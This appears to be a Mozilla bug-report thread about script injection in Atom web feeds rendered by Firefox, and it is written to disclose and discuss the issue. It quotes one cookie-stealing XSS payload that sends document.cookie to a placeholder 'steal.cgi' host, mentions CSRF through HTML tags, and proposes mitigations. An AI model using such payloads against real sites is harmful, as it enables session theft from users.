I'm sorry to be dense, but where is the vulnerability? What can this script do that ordinary script in a web page cannot? Does it run with chrome privileges or something? > We tried emailing the security email address and received no responses so > we're posting this here. Which address, exactly? Gerv
>> I'm sorry to be dense, but where is the vulnerability? What can this script >> do that ordinary script in a web page cannot? Does it run with chrome >> privileges or something? As stated in the original posting we've discovered multiple applications affected by script injection in a web based feed, each having its own context limitations (Some even allowing file system access). Regarding chrome privileges this was not investigated and other concerns/issues may or may not exist. Let me address your question in two parts #1 Web feed content may originate from blog postings, other feeds, P2P websites, or news entries. Depending on the site containing the feed an attacker may be able to steal cookies and send them to a third party host. <script> document.location='http://host/cgi-bin/steal.cgi' +document.cookie</script> </script> Firefox already strips out/disables script injection attempts in various locations within an atom feed, however not within the 'div' tags. In the example above you may be thinking 'why would someone try stealing cookies from themselves?'. Feeds may be created from other feeds, or direct user input. An attacker may post a blog entry with script and the website itself filters the tag injection, however the feed portion of it doesn't. The same goes for feeds creating feeds from other feeds. #2 Even with script execution disabled it is still possible to perform CSRF (http://en.wikipedia.org/wiki/CSRF) due to atoms acceptance of html tags. There is no perfect solution regarding this 'ability'. A few suggestions * Disable HTML tag insertion: This unfortunately removes functionality * Conversion of <>() tags to their HTML entities (Again this removes html formatting functionality) * Creation of a new setting allowing the user to toggle between 'html and/or script on and off' on the feed renderer and have this be turned 'off' by default. >> We tried emailing the security email address and received no responses so >> we're posting this here. > >Which address, exactly? firstname.lastname@example.org Please let us know if you have any additional questions email@example.com
In Firefox 1.5 these were treated as XML, and scripts are valid in XML. In Firefox 2 these are detected as feeds and no scripts are run.